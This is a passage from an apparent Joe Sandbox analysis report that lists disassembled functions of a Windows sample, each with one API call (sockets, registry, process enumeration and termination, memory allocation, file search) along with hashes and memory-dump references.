Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 5d0f97d4f94a55d416c486535f25878534432b1ce4db7539a7afacde32765e48
Instruction ID: 47dbd7edb0e05e2c697879e4355dd5a036132e2c0f3b779e11120cca8a421ff1
Opcode Fuzzy Hash: 5d0f97d4f94a55d416c486535f25878534432b1ce4db7539a7afacde32765e48
Instruction Fuzzy Hash: 15E04F717052069FEB05CF20DC89D5277AAAB85709710099CE009A7255E671ED07CF80

Function 0041BA91 Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 0041BAA3

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: socket
String ID:
API String ID: 98920635-0
Opcode ID: 4f387bd5af0f20a72835e296e2c7eee7f545c5cc5420c8a99abafb74d37c8c1a
Instruction ID: d99fea216bbd3fbe6a818429399aca5f22705c57db7d802aa728f5a21a2cdef0
Opcode Fuzzy Hash: 4f387bd5af0f20a72835e296e2c7eee7f545c5cc5420c8a99abafb74d37c8c1a
Instruction Fuzzy Hash: AAD05E3975062187F568CA38DCC1B597613ABC0BA5F694328E122AB7D2DAA0A812D704

Function 0041C264 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00001000,00000000), ref: 0041C277

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 7683341fd0684d53d29053bf40176ce8fa730a497a0121adb2484bc89292eabb
Instruction ID: 9f2704b98f0abf395afddc410593a933132834f6a0ad3b1c83884cd4115d755d
Opcode Fuzzy Hash: 7683341fd0684d53d29053bf40176ce8fa730a497a0121adb2484bc89292eabb
Instruction Fuzzy Hash: BFD05E30300641D7E718CB0DCC21F1A7AA2EBC4781F10412CA101962E6CA21EC15C648

Function 0042DC73 Relevance: 1.5, APIs: 1, Instructions: 15registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119), ref: 0042DC93

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5b3c7c1fc3dcf381f2c595158cb0f430b9073ba05e5b283708daae11dc9fde07
Instruction ID: 30479591516056f62c92bab4faf70abe3892d4f6c4a57171a7258af1ba3b3cad
Opcode Fuzzy Hash: 5b3c7c1fc3dcf381f2c595158cb0f430b9073ba05e5b283708daae11dc9fde07
Instruction Fuzzy Hash: F4E01271701200FFEB14AF16DC45F1037A1D78670AF10413CAA29972A3C731E822CA06

Function 0042D74F Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32(?,?), ref: 0042D75D

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: fe159a8f2c354bca25a05df39f8329c0891dfb9029a8f99b2d41823cd7d2bb0c
Instruction ID: 32b47e29c8c4e4985d2e6b5119f68bad3bd8959bd8270ed07dec7e7b1d1ede82
Opcode Fuzzy Hash: fe159a8f2c354bca25a05df39f8329c0891dfb9029a8f99b2d41823cd7d2bb0c
Instruction Fuzzy Hash: 48D06776315606AFC708DF24DD95D2A77A1AB48645B05056CB642C6AA2EA20DC20DB15

Function 004303CB Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 004303D4

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: bc7dd3bab864bc797ab50e6ceabc01495cfe798b5420590e61ed5bf68f20795b
Instruction ID: 811cfe4a494676fbde390922cea192d42fa305f10380b5c27a8bab0f82a53d5f
Opcode Fuzzy Hash: bc7dd3bab864bc797ab50e6ceabc01495cfe798b5420590e61ed5bf68f20795b
Instruction Fuzzy Hash: 40D0C9763125029FC6089B14E86993936A4DF49251305016CE802876A1CF25D8A08A99

Function 004304F3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 004304FA

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: 8e27f0d2fdd976d272881632869cfbba51bc045c96c54cc50bc624da6d07fe41
Instruction ID: 9f69487ef0f9e7ed8f42b5d1d7ef999b2d287acd27cad8011a82b896e00d1f34
Opcode Fuzzy Hash: 8e27f0d2fdd976d272881632869cfbba51bc045c96c54cc50bc624da6d07fe41
Instruction Fuzzy Hash: 26D012F73055419FC315EB28ECE4D19339C9B08657305002AF406C72A2DB59DC109B55

Function 00430460 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(?,00000000), ref: 00430468

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: e86f05a67497d1fea2fff4539a9e45a1427e24e617c0304fcdf050ad5a08107b
Instruction ID: 2e4019bdfb3df501059d47f5a25b17f660ee4964c6bd1ff6baa614d2e0209fc4
Opcode Fuzzy Hash: e86f05a67497d1fea2fff4539a9e45a1427e24e617c0304fcdf050ad5a08107b
Instruction Fuzzy Hash: E1C04C37156A049FC2019B94EC8CB3A77B4FB59B06F541068F6118A1F1CB39D4059BAD

Function 00420056 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 00420060

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ba15b80400af849bedfa9bdd7548318f3e762e56665dbe9285eae3c702d66b83
Instruction ID: eef9897b1fb41e8a65410fb092d34d02dd592ed8b8b465fd92c8e953e2fa59b9
Opcode Fuzzy Hash: ba15b80400af849bedfa9bdd7548318f3e762e56665dbe9285eae3c702d66b83
Instruction Fuzzy Hash: 6C015E32A00204CFCB01EFA8DC819D8B7B4FF99715B048265EC15F7222EB30EA95CB95

Function 00401550 Relevance: 1.3, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cb1768ae9da4e5569a1892c688f9012e12212ad0ec4b01796b13590a1baa2b72
Instruction ID: d381985f4f1ca88c715a73fee5d9d17987641c67ee17acc7cdf1ec0a32ccbaa4
Opcode Fuzzy Hash: cb1768ae9da4e5569a1892c688f9012e12212ad0ec4b01796b13590a1baa2b72
Instruction Fuzzy Hash: F0F02062B007106BE210EB7CCC59B3B33A9AB80B51B088928E840EB362EA21DD4082D0

Function 0042019C Relevance: 1.3, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 004201B4

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: ec5eb707b25f4ac269c5d2498531468002ba48258fd4dfc91d669cddda2927c0
Instruction ID: a9ba7a16d6922afea810aed14a9ba6ed4fdf219801f75906338553dc9746fa30
Opcode Fuzzy Hash: ec5eb707b25f4ac269c5d2498531468002ba48258fd4dfc91d669cddda2927c0
Instruction Fuzzy Hash: 6EE0C275305302DFCB08EF68C8E195577A2FB4935471584A8ED05CB366E630E815CB04

Function 0042F66E Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 0042F679

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 6bf1a4beac4dcf7016479ae5b5ff59a4a4f530d0b72ddbfeaf51d0d51b18914f
Instruction ID: d67ed674be7f1af4f98c50bc0cf2c0d206bc9cf83d57759882fdf6881a601039
Opcode Fuzzy Hash: 6bf1a4beac4dcf7016479ae5b5ff59a4a4f530d0b72ddbfeaf51d0d51b18914f
Instruction Fuzzy Hash: 96D05E743412039FDB08CB54E8A6A2A7762AF9C301B40415DE2028B1A5DA71A8348B15

Function 00401613 Relevance: 1.3, APIs: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?), ref: 00401622

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ec5428cbf0a92b54605a90acd6aab7267b4feeefb5816c581ffb31b32d743650
Instruction ID: f045eb9f34ce66b2f03eeb842ed877518a0e46e99e7241f48a6d79c63e09c46b
Opcode Fuzzy Hash: ec5428cbf0a92b54605a90acd6aab7267b4feeefb5816c581ffb31b32d743650
Instruction Fuzzy Hash: 14D0A9B1700A018BCB00CB68CCA0B5237E2ABC820172481348818CA7AACA32E8068E44

Function 00430B5C Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 00430B66

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2ac562affd4e14db702c290e634ea2ac247a3210d3bebbe5eb701c44c92d2f95
Instruction ID: e82226d17f8e65101f10b19a3d742561753d75ce1a8ebe9fe2233a58023671c3
Opcode Fuzzy Hash: 2ac562affd4e14db702c290e634ea2ac247a3210d3bebbe5eb701c44c92d2f95
Instruction Fuzzy Hash: 6BD05E3BB052018FC320DB14CEE881433B3BFD83027198030D5054B2A6D674B944CB04

Non-executed Functions

Function 004288E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00428992

Strings

\*.*, xrefs: 00428929, 0042892F, 0042894B

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileFindFirst
String ID: \*.*
API String ID: 1974802433-1173974218
Opcode ID: e3a29cfd67c9dc835bb2a49c35504ba7486fb045f3a5583b645fb6850008e702
Instruction ID: 1ecfd6f5007a7fdc23e7d8fbb0dda4b7064a62428e5082deeb66822d7af26ccf
Opcode Fuzzy Hash: e3a29cfd67c9dc835bb2a49c35504ba7486fb045f3a5583b645fb6850008e702
Instruction Fuzzy Hash: 1A212C36A02654AFC700DB9CDC89E9977E4EF49311B484029F416E7352D774EE45CB68

Function 00405081 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

